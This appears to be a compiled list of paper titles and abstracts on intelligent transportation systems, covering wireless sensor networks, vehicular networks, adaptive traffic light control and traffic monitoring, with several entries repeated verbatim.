--- paper_title: Using GPS Data to Gain Insight into Public Transport Travel Time Variability paper_content: Transit service reliability is an important determinant of service quality, which has been mainly studied from the perspective of passengers waiting at stops. Day-to-day variability of travel time also deteriorates service reliability, but is not a well-researched area in the literature partly due to the lack of comprehensive data sets on bus travel times. While this problem is now being addressed through the uptake of global positioning system (GPS)-based tracking systems, methodologies to analyze these data sets are limited. This paper addresses this issue by investigating day-to-day variability in public transport travel time using a GPS data set for a bus route in Melbourne, Australia. It explores the nature and shape of travel time distributions for different departure time windows at different times of the day. Factors causing travel time variability of public transport are also explored using a linear regression analysis. The results show that in narrower departure time windows, travel time distributions are best characterized by normal distributions. For wider departure time windows, peak-hour travel times follow normal distributions, while off-peak travel times follow lognormal distributions. The factors contributing to the variability of travel times are found to be land use, route length, number of traffic signals, number of bus stops, and departure delay relative to the scheduled departure time. Travel time variability is higher in the AM peak and lower in the off-peak. The impact of rainfall on travel time variability is only found significant in the AM peak. While the paper presents new methods for analyzing GPS-based data, there is much scope for expanding knowledge through wider applications to new data sets and using a wider range of explanatory variables. --- paper_title: Reducing Traffic Jams via VANETs paper_content: A transition from free flow to congested traffic on highways often spontaneously originates, despite the fact that the road could satisfy a higher traffic demand. The reasons for such a traffic breakdown are perturbations caused by human drivers in dense traffic. We present a strategy to reduce traffic congestion with the help of vehicle-to-vehicle communication. Periodically emitted beacons are used to analyze traffic flow and to warn other drivers of a possible traffic breakdown. Drivers who receive such a warning are told to keep a larger gap to their predecessor. By doing so, they are less likely to be the source of perturbations, which can cause a traffic breakdown. We analyze the proposed strategy via computer simulations and investigate which fraction of communicating vehicles is necessary until a beneficial influence on traffic flow is observable. We show that penetration rates of 10% and less can have significant influence on traffic flow and travel times. In addition to applying a realistic mobility model, we further increase the degree of realism by the use of empirical traffic data from loop detectors on a German Autobahn. --- paper_title: A model for traffic control in urban environments paper_content: Wireless technologies can help solve traffic congestions in urban environments, where road infrastructures develop slower than the sometimes exponential growth in the number of cars in traffic. We present a model for traffic control and congestion avoidance developed over a vehicular ad-hoc network created between the cars in traffic and the road infrastructure. We propose a solution for monitoring traffic using not only sensors within the road infrastructure, but also the cars themselves acting as data collectors. The traffic control decision, provided by the road infrastructure, is scalable, load-balanced, and based on correction decisions for the route adjustment based on local areas. We present evaluation results that show the capabilities of the proposed congestion avoidance model. --- paper_title: Effective Urban Traffic Monitoring by Vehicular Sensor Networks paper_content: Traffic monitoring in urban transportation systems can be carried out based on vehicular sensor networks. Probe vehicles (PVs), such as taxis and buses, and floating cars (FCs), such as patrol cars for surveillance, can act as mobile sensors for sensing the urban traffic and send the reports to a traffic-monitoring center (TMC) for traffic estimation. In the TMC, sensing reports are aggregated to form a traffic matrix, which is used to extract traffic information. Since the sensing vehicles cannot cover all the roads all the time, the TMC needs to estimate the unsampled data in the traffic matrix. As this matrix can be approximated to be of low rank, matrix completion (MC) is an effective method to estimate the unsampled data. However, our previous analysis on the real traces of taxis in Shanghai reveals that MC methods do not work well due to the uneven samples of PVs, which is common in urban traffic. To exploit the intrinsic relationship between the unevenness of samples and traffic estimation error, we study the temporal and spatial entropies of samples and successfully define the important criterion, i.e., average entropy of the sampling process. A new sampling rule based on this relationship is proposed to improve the performance of estimation and monitoring. With the sampling rule, two new patrol algorithms are introduced to plan the paths of controllable FCs to proactively participate in traffic monitoring. By utilizing the patrol algorithms for real-data-set analysis, the estimation error reduces from 35% to about 10%, compared with the random patrol or interpolation method in traffic estimation. Both the validity of the exploited relationship and the effectiveness of the proposed patrol control algorithms are demonstrated. --- paper_title: Mobility management algorithms and applications for mobile sensor networks paper_content: Wireless sensor networks (WSNs) offer a convenient way to monitor physical environments. In the past, WSNs are all considered static to continuously collect information from the environment. Today, by introducing intentional mobility to WSNs, we can further improve the network capability on many aspects, such as automatic node deployment, flexible topology adjustment, and rapid event reaction. In this paper, we survey recent progress in mobile WSNs and compare works in this field in terms of their models and mobility management methodologies. The discussion includes three aspects. Firstly, we discuss mobility management of mobile sensors for the purposes of forming a better WSN, enhancing network coverage and connectivity, and relocating some sensors. Secondly, we introduce path-planning methods for data ferries to relay data between isolated sensors and to extend a WSN's lifetime. Finally, we review some existing platforms and discuss several interesting applications of mobile WSNs. Copyright © 2010 John Wiley & Sons, Ltd. --- paper_title: Real time evaluation of shortest remaining processing time based schedulers for traffic congestion control using wireless sensor networks paper_content: Pre-timed traffic signals are inefficient in optimizing the traffic flow throughout the day, resulting in greater waiting times at the intersections particularly in congested urban areas during peak hours. Traffic actuated signals use real time traffic data obtained from sensors at the intersections to service queues intelligently. We developed a test bed for the real time evaluation of adaptive traffic light control algorithms using the microscopic traffic simulation open source software, SUMO (Simulation of Urban Mobility), and the AVR 32-bit microcontroller. An interface was developed between SUMO and the AVR microcontroller in which we used the simulation data generated by SUMO as an input to the microcontroller which executed the scheduling algorithms and sent commands back to SUMO for changing the states of the traffic signals accordingly. We implemented four scheduling algorithms in SUMO through the AVR microcontroller, the effect of the algorithms on the traffic network was studied using SUMO and execution times of the scheduling algorithms were measured using the AVR microcontroller. Through this interface, scheduling algorithms can be evaluated more effectively and accurately as compared to the case in which the algorithms are fed with data using pseudo random number generators. --- paper_title: Effective Urban Traffic Monitoring by Vehicular Sensor Networks paper_content: Traffic monitoring in urban transportation systems can be carried out based on vehicular sensor networks. Probe vehicles (PVs), such as taxis and buses, and floating cars (FCs), such as patrol cars for surveillance, can act as mobile sensors for sensing the urban traffic and send the reports to a traffic-monitoring center (TMC) for traffic estimation. In the TMC, sensing reports are aggregated to form a traffic matrix, which is used to extract traffic information. Since the sensing vehicles cannot cover all the roads all the time, the TMC needs to estimate the unsampled data in the traffic matrix. As this matrix can be approximated to be of low rank, matrix completion (MC) is an effective method to estimate the unsampled data. However, our previous analysis on the real traces of taxis in Shanghai reveals that MC methods do not work well due to the uneven samples of PVs, which is common in urban traffic. To exploit the intrinsic relationship between the unevenness of samples and traffic estimation error, we study the temporal and spatial entropies of samples and successfully define the important criterion, i.e., average entropy of the sampling process. A new sampling rule based on this relationship is proposed to improve the performance of estimation and monitoring. With the sampling rule, two new patrol algorithms are introduced to plan the paths of controllable FCs to proactively participate in traffic monitoring. By utilizing the patrol algorithms for real-data-set analysis, the estimation error reduces from 35% to about 10%, compared with the random patrol or interpolation method in traffic estimation. Both the validity of the exploited relationship and the effectiveness of the proposed patrol control algorithms are demonstrated. --- paper_title: Efficient Data Propagation in Traffic-Monitoring Vehicular Networks paper_content: Road congestion and traffic-related pollution have a large negative social and economic impact on several economies worldwide. We believe that investment in the monitoring, distribution, and processing of traffic information should enable better strategic planning and encourage better use of public transport, both of which would help cut pollution and congestion. This paper investigates the problem of efficiently collecting and disseminating traffic information in an urban setting. We formulate the traffic data acquisition problem and explore solutions in the mobile sensor network domain while considering realistic application requirements. By leveraging existing infrastructure such as traveling vehicles in the city, we propose traffic data dissemination schemes that operate on both the routing and the application layer; our schemes are frugal in the use of the wireless medium, rendering our system interoperable with the proliferation of competing applications. We introduce the following two routing algorithms for vehicular networks that aim at minimizing communication and, at the same time, adhering to a delay threshold set by the application: 1) delay-bounded greedy forwarding and 2) delay-bounded minimum-cost forwarding. We propose a framework that jointly optimizes the two key processes associated with monitoring traffic, i.e., data acquisition and data delivery, and provide a thorough experimental evaluation based on realistic vehicular traces on a real city map. --- paper_title: Instrumentation for safe vehicular flow in intelligent traffic control systems using wireless networks paper_content: This paper describes a ZigBee based wireless system to assists traffic flow on arterial urban roads. Real-time simulation in laboratory environment is conducted to determine the traffic throughput to avoid possible congestions or ease existing congestions. Random numbers are generated to mimic approaching traffic, and this information is shared by a ZigBeebased real-time wirelessly network. Wireless nodes are connected to different PLCs representing different traffic lights in a cluster. Once the information is shared the timing and sequencing decisions are taken collectively in a synchronized manner. In this paper, the information is displayed on SCADA connected to each PLC for viewing the characteristics of continuous vehicular flow. It is found that the topology of the network can play an important role in the throughput of data, which may be critical in safety critical operations such as the control of traffic lights. This paper aims to highlight some of the possible effects of dataflow flow and time-delays faced by modern intelligent control of traffic lights. --- paper_title: Research on Traffic Monitoring Network and Its Traffic Flow Forecast and Congestion Control Model Based on Wireless Sensor Networks paper_content: In this paper, we have made a comprehensive study about the key technologies including applying wireless sensor networks to the traffic monitoring network, its traffic flow forecast based on gray forecasting model and traffic congestion control. According to the features that wireless sensor networks have no space constraints, flexible distribution, mobile convenience and quick reaction, we present a scheme that uses wireless sensor networks to monitor city transport vehicles and have designed a traffic monitoring system based on wireless sensor network that is applicable to all types of city environment. With the system, we can monitor the important roads that are easily blocked and find out the time changing law of traffic congestion, and then put the focus on monitoring them in order to greatly reduce the investment and achieve high efficiency. As far as the traffic flow forecasting methods concerned, we use Adaptive GM (1, 1) Model which have a real-time rolling forecast for city traffic and have a better forecast results. Because of the fewer study about the traffic congestion control in the current academia, we make a deep study about the traffic congestion control issues in this article. Learn from mature congestion control algorithm in computer network, we have designed an algorithm of traffic flow congestion control and scheduling for traffic network, which is called TRED. We have used it for real-time traffic scheduling and have opened up a new way to study and solve traffic congestion control problems. --- paper_title: Wireless sensor networks for traffic monitoring in a logistic centre paper_content: Abstract A wireless sensor network (WSN) is a net of small sensor nodes, communicating using wireless technology to collect data. It combines distributed sensing and wireless communication, integrated in a self-powered small device with limited computation and memory functions. In this research, a WSN for traffic monitoring was installed and tested in the area of a logistic platform, the freight village of Turin. The sensor network layout was designed to detect all vehicles entering and leaving the area as well as the zones to which they are relating. One peculiarity of the logistic centre installation is related to the sensors’ locations on the roadway: as it was not possible to install sensors in optimal locations, characterised by almost-constant vehicle speed, scarce lane changing, and stationary vehicle pattern, the detection system accuracy requires assessment using vehicle count and classification. After a statistical analysis of system performance under different traffic conditions, a method to analyse and correct detection data is then proposed to reach satisfactory accuracy even in atypical installations. --- paper_title: Improving emergency messages transmission delay in road monitoring based WSNs paper_content: The main wireless technology used for events sensing and data collection is wireless sensor devices. These sensors are mounted on vehicles or in the roadside to send data collected periodically or upon incident detection. In this latter case, ensuring low transmission delay from the detector sensor to WSNs gateway is a real challenge. Indeed, faster notification of the Traffic Management System (TMS) leads to more efficient reaction to the emergency situation. Thus, cars collision and human lives loss as well as road traffic jam will be mitigated. In this paper, we investigate the Medium Access Control (MAC) layer in WSNs to improve the real time data collection scheme. To this end, we propose an enhanced backoff selection scheme for IEEE 802.15.4 protocol to ensure fast transmission of the detected events on the road towards the TMS. The main feature of our scheme is its ability to assign a shorter waiting time for messages carrying critical information without changing the basic principle of the backoff mechanism. The obtained simulation results under various scenarios have proven the effectiveness of our scheme in terms of transmission delay reduction. --- paper_title: Intelligent Vehicle Recognition based on Wireless Sensor Network paper_content: One of the main requirements of any intelligent transportation system is to be able to identify vehicles in the traffic. This paper presents an intelligent vehicle identification system used within a complete solution for a traffic monitoring system thatusesa novelwireless sensor network architecture to monitor traffic. A novel wireless sensor network architecture to monitor traffic is proposed where a visual sensor node captures images of the traffic and sends them to the traffic control center for processing. Also, this paper compares between three main localization and recognition algorithms. To locate the vehicle logo in the traffic image a symmetry detection algorithm is used to detect the inherent symmetry in vehicle frontal images. A fine location of the logo is identified using three different methods in the region marked by the symmetry line. After locating the logo three feature sets are extracted and presented to the classifier to correctly identify the type of the vehicle. The results of the localization and recognition algorithms show the efficiency of the presented system in identifying vehicle types with a recognition rate over 90%. --- paper_title: Intelligent Traffic Light System to Prioritized Emergency Purpose Vehicles based on Wireless Sensor Network paper_content: The use of Wireless Sensor Network (WSN) has proved to be a very beneficial in the design of adaptive and dynamic traffic light intersection system that will minimize the waiting time of vehicles and also manage the traffic load at the intersection adaptively. In this paper, we propose an adaptive traffic intersection system based on Wireless Sensor Network where the traffic light of one intersection can communicate with the traffic light of the next neighboring intersections and traffic clearance will be prioritized for special vehicles with the help of sensors. General Terms: Wireless Sensor Network. --- paper_title: Design and Research on Traffic Signal of Wireless Sensor Network Based on Labview paper_content: In order to solve the increasingly serious traffic problems in the city, how to achieve effective management and control of the traffic information has become an urgent problem that should be solved in transportation of our country. This paper proposes a design on traffic signal of wireless sensor network based on LabVIEW, including traffic signal controller, GPRS wireless modem and LabVIEW interface. It adopts GPRS wireless telecommunication as the method to transport the data of traffic signal control. This method could solve the problem of high costs and the difficult problems in using wired telecommunication cable system. Traffic signal device adopts Single Chip Microcomputer to control, introduces the information collection module by using the front-end of the HMC5883L Magnetoresistive Sensor. It describes the GPRS technology and relating properties. The traffic signal monitor interface designed by LabVIEW software, and achieves the control of traffic signal. Keywords—GPRS; Traffic Signal; HMC5883L Magnetoresistive Sensor --- paper_title: Intelligent transportation system based on SIP/ZigBee architecture paper_content: In a heterogeneous network environment, constructing applications of remote distributed intelligent transportation system (ITS) are faced with complex communication problems proposed by online management, data acquisition and the coordination control of traffic node devices. Therefore, a framework based on SIP/ZigBee architecture is proposed. By using SIP and its extensions, a seamless convergence of traffic measurement and control network between the Internet and a short-range wireless sensor and actuator networks (WSAN) can be achieved. The application result shows that various remote communications and control operations of ITS distributed nodes can be unified and simplified. --- paper_title: Instrumentation for safe vehicular flow in intelligent traffic control systems using wireless networks paper_content: This paper describes a ZigBee based wireless system to assists traffic flow on arterial urban roads. Real-time simulation in laboratory environment is conducted to determine the traffic throughput to avoid possible congestions or ease existing congestions. Random numbers are generated to mimic approaching traffic, and this information is shared by a ZigBeebased real-time wirelessly network. Wireless nodes are connected to different PLCs representing different traffic lights in a cluster. Once the information is shared the timing and sequencing decisions are taken collectively in a synchronized manner. In this paper, the information is displayed on SCADA connected to each PLC for viewing the characteristics of continuous vehicular flow. It is found that the topology of the network can play an important role in the throughput of data, which may be critical in safety critical operations such as the control of traffic lights. This paper aims to highlight some of the possible effects of dataflow flow and time-delays faced by modern intelligent control of traffic lights. --- paper_title: Implementing Intelligent Traffic Control System for Congestion Control Ambulance Clearance and Stolen Vehicle Detection paper_content: Traffic congestion is a major problem in cities of developing Countries like India. Growth in urban population and the middle-class segment consume vehicles to the rising number of vehicles in the cities. Congestion on roads eventually results in slow moving traffic, which increases the time of travel, thus be notable as one of the major issues in metropolitan cities. Emergency vehicles like ambulance and fire trucks need to reach their destinations at the earliest. If they spend a lot of time in traffic jams, valued lives of many people may be in danger. Here the image sequences from a camera are analyzed using various edge detection and object counting methods to obtain the most efficient technique. Then, the number of vehicles at the intersection is evaluated and traffic is efficiently managed. The traffic signal indication continuously glows to green as long as the emergency vehicle is waiting at the traffic lane. After the vehicle crossed the junction, automatically the traffic signals follow the previous pattern generation of traffic signals. This can be implemented in LABVIEW. --- paper_title: An Approach towards Traffic Management System using Density Calculation and Emergency Vehicle Alert paper_content: Now a day's many of the things get controlled automatically. Everything is getting controlled using the mechanical or the automated systems. In every field machines are doing the human works. But still some area is controlled manually. For example traffic controls, road control, parking controlling. Keeping these things in mind we are trying to develop the project to automate the traffic tracking for the square. To make any project more useful and acceptable by any organization we need to provide multiple features in a single project. Keeping these things in consideration proposed system is less with multiple methodologies which can be used in traffic control system It is important to know the road traffic density real time especially in mega cities for signal control and effective traffic management. In recent years, video monitoring and surveillance systems have been widely used in traffic management.Hence, traffic density estimation and vehicle classification can be achieved using video monitoring systems. In most vehicle detection methods in the literature, only the detection of vehicles in frames of the given video is emphesized. However, further analysis is needed in order to obtain the useful information for traffic management such as real time traffic density and number of vehicle types passing these roads. This paper presents emergency vehicle alert and traffic density calculation methods using IR and GPS --- paper_title: Intelligent transportation systems for wireless sensor networks based on ZigBee paper_content: Combining with the characteristics of intelligent transportation system and introduces wireless sensor networks technology. This paper illustrates a kind of intelligent transportation system solution of wireless sensor networks based on ZigBee technology. Through the comprehensive analysis of three respects of network topology, energy saving as well as being stable and reliable, this paper brings forward the hardware design of sensor network node and network protocols suitable for urban public transport system. Online travel buses can be monitored in real-time, to achieve the purpose of intelligent management. This system has higher cost performance compare with the current GPS used in public transit system. --- paper_title: Research on Traffic Monitoring Network and Its Traffic Flow Forecast and Congestion Control Model Based on Wireless Sensor Networks paper_content: In this paper, we have made a comprehensive study about the key technologies including applying wireless sensor networks to the traffic monitoring network, its traffic flow forecast based on gray forecasting model and traffic congestion control. According to the features that wireless sensor networks have no space constraints, flexible distribution, mobile convenience and quick reaction, we present a scheme that uses wireless sensor networks to monitor city transport vehicles and have designed a traffic monitoring system based on wireless sensor network that is applicable to all types of city environment. With the system, we can monitor the important roads that are easily blocked and find out the time changing law of traffic congestion, and then put the focus on monitoring them in order to greatly reduce the investment and achieve high efficiency. As far as the traffic flow forecasting methods concerned, we use Adaptive GM (1, 1) Model which have a real-time rolling forecast for city traffic and have a better forecast results. Because of the fewer study about the traffic congestion control in the current academia, we make a deep study about the traffic congestion control issues in this article. Learn from mature congestion control algorithm in computer network, we have designed an algorithm of traffic flow congestion control and scheduling for traffic network, which is called TRED. We have used it for real-time traffic scheduling and have opened up a new way to study and solve traffic congestion control problems. --- paper_title: Adaptive Traffic Signal Flow Control Using Wireless Sensor Networks paper_content: The growth and scale of vehicles today makes management of traffic a constant problem. Measures such as toll based systems with electronic smart card recognition, advance notification on traffic status and fixed time control signaling are some of the measures considered to alleviate the traffic woes of passengers. However a sizeable sum of problems still exists due to incomplete utilization of the road systems. In this paper, an approach to make the traffic signal adaptive to the dynamic traffic flow using wireless sensor network is proposed. The proposed approach is simulated in LabView software and compared with the existing fixed time control scheme. From the results obtained it is observed that the proposed approach outperforms the existing approaches. --- paper_title: Intelligent traffic management with wireless sensor networks paper_content: Vehicular travel is gaining importance everywhere, particularly in large urban areas. The current technologies that support vehicular travel like wired sensors, inductive loops, surveillance camera etc., are expensive and also require high maintenance cost. Further the accuracy of these devices also depends on environment conditions. The typical traditional approaches attempt to optimize traffic lights control for a particular density and configuration of traffic. However, the major disadvantage of using these techniques is that the dynamic behavior of traffic densities and configurations change is difficult to model constantly. Traffic seems to be an adaptation problem rather than an optimization problem. This paper therefore tries to address the above issue, and hence we propose algorithms which perform adaptive traffic light control using a wireless sensor network setup. The paper aims at analyzing methods to build an intelligent system that can blend and support some of the existing technologies of traffic control and therefore reduce the average waiting time of vehicles on a junction. The proposed algorithms are adaptive to traffic flow at any intersection point of roads. Simulations of the real-life traffic scenarios are conducted in a simulated platform called Green Light District Simulator (GLD) to generate graph average waiting time versus cycles. The results generated show that the proposed method is effective for the traffic control in a real road intersection. --- paper_title: A novel approach for dynamic traffic lights management based on Wireless Sensor Networks and multiple fuzzy logic controllers paper_content: HighlightsFlexible, scalable traffic lights dynamic control system for isolated intersections.Multiple parallel fuzzy controllers dynamically manage both the phase and green time.Outperforms other works in terms of vehicle waiting time and balancing between phases.Very effective under heavy traffic and when phases have unbalanced arrival rates.Lightweight effective implementable on COTS devices: broad practical impact expected. This paper proposes a novel approach to dynamically manage the traffic lights cycles and phases in an isolated intersection. The target of the work is a system that, comparing with previous solutions, offers improved performance, is flexible and can be implemented on off-the-shelf components. The challenge here is to find an effective design that achieves the target while avoiding complex and computationally expensive solutions, which would not be appropriate for the problem at hand and would impair the practical applicability of the approach in real scenarios. The proposed solution is a traffic lights dynamic control system that combines an IEEE 802.15.4 Wireless Sensor Network (WSN) for real-time traffic monitoring with multiple fuzzy logic controllers, one for each phase, that work in parallel. Each fuzzy controller addresses vehicles turning movements and dynamically manages both the phase and the green time of traffic lights. The proposed system combines the advantages of the WSN, such as easy deployment and maintenance, flexibility, low cost, noninvasiveness, and scalability, with the benefits of using four parallel fuzzy controllers, i.e., better performance, fault-tolerance, and support for phase-specific management. Simulation results show that the proposed system outperforms other solutions in the literature, significantly reducing the vehicles waiting times. A proof-of-concept implementation on an off-the-shelf device proves that the proposed controller does not require powerful hardware and can be easily implemented on a low-cost device, thus paving the way for extensive usage in practice. --- paper_title: Efficient dynamic traffic control system using wireless sensor networks paper_content: This paper proposes an improved traffic control system by having dynamic time limits at the traffic signal intersections. The proposed system uses sensors to find the traffic conditions to dynamically control the traffic. Prevailing static traffic control system may block emergency vehicles such as ambulance due to traffic congestion. The proposed Efficient Dynamic Traffic Control System (EDTCS) has Traffic Control Unit (TCU), Monitor Unit (MU) and Road Side Unit (RSU). RSU contains RFID reader which reads the unique RFID code for an emergency vehicle and send it to MU. MU uses sensors such as proximity switch and RFID tags to get the count of normal and emergency vehicles respectively and sensed information is sent to TCU. TCU receives the count of normal and emergency vehicles and changes the signal dynamically by comparing the count obtained from different lanes. The proposed EDTCS saves travel time and gives a special priority to emergency vehicles like ambulance. --- paper_title: A distributed algorithm for multiple intersections adaptive traffic lights control using a wireless sensor networks paper_content: In this article, we detail and evaluate a distributed algorithm that defines the green lights sequence and duration in a multi-intersection intelligent transportation system (ITS). We expose the architecture of a wireless network of sensors deployed at intersections, which takes local decisions without the help of a central entity. We define an adaptive algorithm, called TAPIOCA (distribuTed and AdaPtive IntersectiOns Control Algorithm), that uses data collected by this sensor network to decide dynamically of the green light sequences, considering three objectives: (i) reducing the users average waiting time while limiting the starvation probability; (ii) selecting in priority the movements that have the best load discharge potential and (iii) synchronizing successive lights, for example to create green waves. Simulation results performed with the SUMO simulator show that TAPIOCA achieves a low average waiting time of vehicles and reacts quickly to traffic load increases, compared to other dynamic strategies and to pre-determined schedules. --- paper_title: Simulation of dynamic traffic control system based on wireless sensor network paper_content: The use of wireless sensor network in the smart traffic control systems is very beneficial and starting to be very promising in the design and implementation for such systems. It will help in saving people time and adapt the intersections traffic lights to the traffic loads from each direction. In this paper we present an intelligent traffic signals control system based on a wireless sensor network (WSN). It uses the vehicle queue length during red cycle to perform better control in the next green cycle. The main objective is to minimize the average waiting time that will reduce the queues length and do better traffic management based on the arrivals in each direction. The system also includes an approach to alert the people about the red light crossing to minimize the possibility of accidents due to red light crossing violations. The system was simulated and results are shown in the end of this paper. --- paper_title: Adaptive Traffic Light Control in Wireless Sensor Network-Based Intelligent Transportation System paper_content: We investigate the problem of adaptive traffic light control using real-time traffic information collected by a wireless sensor network (WSN). Existing studies mainly focused on determining the green light length in a fixed sequence of traffic lights. In this paper, we propose an adaptive traffic light control algorithm that adjusts both the sequence and length of traffic lights in accordance with the real time traffic detected. Our algorithm considers a number of traffic factors such as traffic volume, waiting time, vehicle density, etc., to determine green light sequence and the optimal green light length. Simulation results demonstrate that our algorithm produces much higher throughput and lower vehicle's average waiting time, compared with a fixed-time control algorithm and an actuated control algorithm. We also implement proposed algorithm on our transportation testbed, iSensNet, and the result shows that our algorithm is effective and practical. --- paper_title: Intelligent Traffic Light Flow Control System Using Wireless Sensors Networks paper_content: Vehicular traffic is continuously increasing around the world, especially in large urban areas. The resulting congestion has become a major concern to transportation specialists and decision makers. The existing methods for traffic management, surveillance and control are not adequately efficient in terms of performance, cost, maintenance, and support. In this paper, the design of a system that utilizes and efficiently manages traffic light controllers is presented. In particular, we present an adaptive traffic control systembased on a new traffic infrastructure using Wireless Sensor Network (WSN) and using new techniques for controlling the traffic flow sequences. These techniques are dynamically adaptive to traffic conditions on both single and multiple intersections. A WSN is used as a tool to instrument and control traffic signals roadways, while an intelligent traffic controller is developed to control the operation of the traffic infrastructure supported by the WSN. The controller embodies traffic system communication algorithm (TSCA) and the traffic signals time manipulation algorithm (TSTMA). Both algorithms are able to provide the system with adaptive and efficient traffic estimation represented by the dynamic change in the traffic signals' flow sequence and traffic variation. Simulation results show the efficiency of the proposed scheme in solving traffic congestion in terms of the average waiting time and average queue length on the isolated (single) intersection and efficient global traffic flow control on multiple intersections. A test bed was also developed and deployed for real measurements. The paper concludes with some future highlights and useful remarks. --- paper_title: Adaptive Traffic Light Control of Multiple Intersections in WSN-Based ITS paper_content: We investigate the problem of adaptive traffic light control of multiple intersections using real-time traffic data collected by a wireless sensor network (WSN). Previous studies mainly focused on optimizing the intervals of green lights in fixed sequences of traffic lights and ignored the traffic flow's characteristics and special traffic circumstances. In this paper, we propose an adaptive traffic light control scheme that adjusts the sequences of green lights in multiple intersections based on the real- time traffic data, including traffic volume, waiting time, number of stops, and vehicle density. Subsequently, the optimal green light length can be calculated from the local traffic data and traffic condition of neighbor intersections. Simulation results demonstrate that our scheme produces much higher throughput, lower average waiting time and fewer number of stops, compared with three control approaches: the optimal fixed-time control, an actuated control and an adaptive control. --- paper_title: Traffic lights detection and state estimation using Hidden Markov Models paper_content: The detection of a traffic light on the road is important for the safety of persons who occupy a vehicle, in a normal vehicles or an autonomous land vehicle. In normal vehicle, a system that helps a driver to perceive the details of traffic signals, necessary to drive, could be critical in a delicate driving manoeuvre (i.e crossing an intersection of roads). Furthermore, traffic lights detection by an autonomous vehicle is a special case of perception, because it is important for the control that the autonomous vehicle must take. Multiples authors have used image processing as a base for achieving traffic light detection. However, the image processing presents a problem regarding conditions for capturing scenes, and therefore, the traffic light detection is affected. For this reason, this paper proposes a method that links the image processing with an estimation state routine formed by Hidden Markov Models (HMM). This method helps to determine the current state of the traffic light detected, based on the obtained states by image processing, aiming to obtain the best performance in the determination of the traffic light states. With the proposed method in this paper, we obtained 90.55% of accuracy in the detection of the traffic light state, versus a 78.54% obtained using solely image processing. The recognition of traffic lights using image processing still has a large dependence on the capture conditions of each frame from the video camera. In this context, the addition of a pre-processing stage before image processing could contribute to improve this aspect, and could provide a better results in determining the traffic light state. --- paper_title: An Intelligent Fuzzy Control for Crossroads Traffic Light paper_content: The fuzzy control algorithm that carries on the intelligent control twelve phases three traffic lanes single crossroads traffic light, works well in the real-time traffic flow under flexible operation. The procedures can be described as below: first, the number of vehicles of all the lanes can be received through the sensor, and the phase with the largest number is stipulated to be highest priority, while the phase turns to the next one from the previous, it transfers into the highest priority. Then the best of the green light delay time can be figured out under the fuzzy rules reasoning on the current waiting formation length and general formation length. The simulation result indicates the fuzzy control method on vehicle delay time compared with the traditional timed control method is greatly improved. --- paper_title: Towards tag antenna based sensing - An RFID displacement sensor paper_content: Displacements can be used as indicators of structural health and are measured by commercially available sensors that need to be accurate and cost effective. In this paper, we examine a technique to utilize a UHF RFID tag antenna as a displacement sensor by mapping structural deformation to a change in RFID tag characteristics. We evaluate how changes in two different parameters, a) tag backscatter power and b) minimum reader transmit power required for RFID chip activation, can be mapped to structural deformation. The theoretical principles of sensor development are first discussed followed by a presentation of the results of experimentation. It is demonstrated that the sensor is sensitive to displacements for a dynamic range of 40 mm. --- paper_title: A dynamic traffic light management system based on wireless sensor networks for the reduction of the red-light running phenomenon paper_content: The real-time knowledge of information concerning traffic light junctions represents a valid solution to congestion problems with the main aim to reduce, as much as possible, accidents. The Red Light Running (RLR) is a behavioural phenomenon that occurs when the driver must to choose to cross (or not) the road when the traffic light changes from green to yellow. Most of the time the drivers cross even during transitions from yellow to red and, as a consequence, the possibility of accidents increases. This often occurs because the drivers wait too much in the traffic light queue as a consequence of the fact that the traffic light is not well balanced. In this paper we propose a technique that, based on information gathered through a wireless sensor network, dynamically processes green times in a traffic light of an isolated intersection. The main aim is to optimise the waiting time in the queue and, as a consequence, reduce the RLR phenomenon occurrence. --- paper_title: Feasibility of deploying wireless sensor based road side solutions for Intelligent Transportation Systems paper_content: The effectiveness of Intelligent Transportation Systems depends on the accuracy and timely reliable provisioning of real time data supplied by traffic data collection mechanisms. Data collection through wireless sensor networks is a very effective approach due to their easy installation, low cost, processing capabilities, small size, flexibility, and wireless communication capabilities. WSN are used in ITS for smart parking lots, adaptive traffic light control, accident avoidance and traffic estimation etc. In this paper we propose a WSN based road side communication architecture and system that can be utilized for the intelligent control and management of vehicular traffic at road intersections. In the proposed architecture, the end nodes are carried by vehicles that communicate with road side units, which in turn send the data to the coordinator module at the intersection. We introduce a reliable and robust channel switching technique that reduces the response time, energy consumption and connectivity delay while increasing the reliability of packet delivery. We perform sensitivity analysis of the proposed system architecture by varying various communication parameters to determine optimum system configuration. The results prove the integrity and feasibility of the deployment of our proposed architecture. --- paper_title: A novel approach for dynamic traffic lights management based on Wireless Sensor Networks and multiple fuzzy logic controllers paper_content: HighlightsFlexible, scalable traffic lights dynamic control system for isolated intersections.Multiple parallel fuzzy controllers dynamically manage both the phase and green time.Outperforms other works in terms of vehicle waiting time and balancing between phases.Very effective under heavy traffic and when phases have unbalanced arrival rates.Lightweight effective implementable on COTS devices: broad practical impact expected. This paper proposes a novel approach to dynamically manage the traffic lights cycles and phases in an isolated intersection. The target of the work is a system that, comparing with previous solutions, offers improved performance, is flexible and can be implemented on off-the-shelf components. The challenge here is to find an effective design that achieves the target while avoiding complex and computationally expensive solutions, which would not be appropriate for the problem at hand and would impair the practical applicability of the approach in real scenarios. The proposed solution is a traffic lights dynamic control system that combines an IEEE 802.15.4 Wireless Sensor Network (WSN) for real-time traffic monitoring with multiple fuzzy logic controllers, one for each phase, that work in parallel. Each fuzzy controller addresses vehicles turning movements and dynamically manages both the phase and the green time of traffic lights. The proposed system combines the advantages of the WSN, such as easy deployment and maintenance, flexibility, low cost, noninvasiveness, and scalability, with the benefits of using four parallel fuzzy controllers, i.e., better performance, fault-tolerance, and support for phase-specific management. Simulation results show that the proposed system outperforms other solutions in the literature, significantly reducing the vehicles waiting times. A proof-of-concept implementation on an off-the-shelf device proves that the proposed controller does not require powerful hardware and can be easily implemented on a low-cost device, thus paving the way for extensive usage in practice. --- paper_title: Using DTMon to monitor transient flow traffic paper_content: We evaluate the performance of the DTMon dynamic traffic monitoring system to measure travel times and speeds in transient flow traffic caused by non-recurring congestion. DTMon uses vehicular networks and roadside infrastructure to collect data from passing vehicles. We show DTMon's ability to gather high-quality real-time traffic data such as travel time and speed. These metrics can be used to detect transitions in traffic flow (e.g., caused by congestion) especially where accurate flow rate information is not available. We evaluate the accuracy and latency of DTMon in providing traffic measurements using two different methods of message delivery. We show the advantages of using dynamically-defined measurement points for monitoring transient flow traffic. We compare DTMon with currently in-use probe-based systems (e.g., AVL) and fixed-point sensors and detectors (e.g., ILD). ---
